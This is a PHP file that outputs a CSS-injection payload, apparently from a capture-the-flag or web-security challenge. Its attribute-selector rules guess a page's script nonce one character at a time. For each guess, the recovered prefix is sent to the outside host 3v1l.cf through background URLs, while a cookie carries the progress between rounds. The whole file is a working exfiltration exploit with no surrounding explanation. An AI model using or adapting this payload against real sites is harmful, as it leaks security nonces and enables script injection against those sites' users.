<?php
header("Content-Type: text/css; charset=utf-8");

$n = $_COOKIE['oldmatch'];
if($n=='!'){
    $n='';
}

?>
script{display:block!important;}
script[nonce="<?=$n?>"]:after{content: url("//3v1l.cf/3-4-record.php?finish=<?=$n?>");display: block;}script[nonce^="<?=$n?>a"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>a");display: block;}script[nonce^="<?=$n?>b"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>b");display: block;}script[nonce^="<?=$n?>c"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>c");display: block;}script[nonce^="<?=$n?>d"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>d");display: block;}script[nonce^="<?=$n?>e"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>e");display: block;}script[nonce^="<?=$n?>f"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>f");display: block;}script[nonce^="<?=$n?>g"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>g");display: block;}script[nonce^="<?=$n?>h"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>h");display: block;}script[nonce^="<?=$n?>i"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>i");display: block;}script[nonce^="<?=$n?>j"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>j");display: block;}script[nonce^="<?=$n?>k"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>k");display: block;}script[nonce^="<?=$n?>l"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>l");display: block;}script[nonce^="<?=$n?>m"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>m");display: block;}script[nonce^="<?=$n?>n"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>n");display: block;}script[nonce^="<?=$n?>o"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>o");display: block;}script[nonce^="<?=$n?>p"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>p");display: block;}script[nonce^="<?=$n?>q"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>q");display: block;}script[nonce^="<?=$n?>r"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>r");display: block;}script[nonce^="<?=$n?>s"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>s");display: block;}script[nonce^="<?=$n?>t"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>t");display: block;}script[nonce^="<?=$n?>u"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>u");display: block;}script[nonce^="<?=$n?>v"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>v");display: block;}script[nonce^="<?=$n?>w"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>w");display: block;}script[nonce^="<?=$n?>x"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>x");display: block;}script[nonce^="<?=$n?>y"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>y");display: block;}script[nonce^="<?=$n?>z"]:after{content: url("//3v1l.cf/3-4-record.php?newmatch=<?=$n?>z");display: block;}
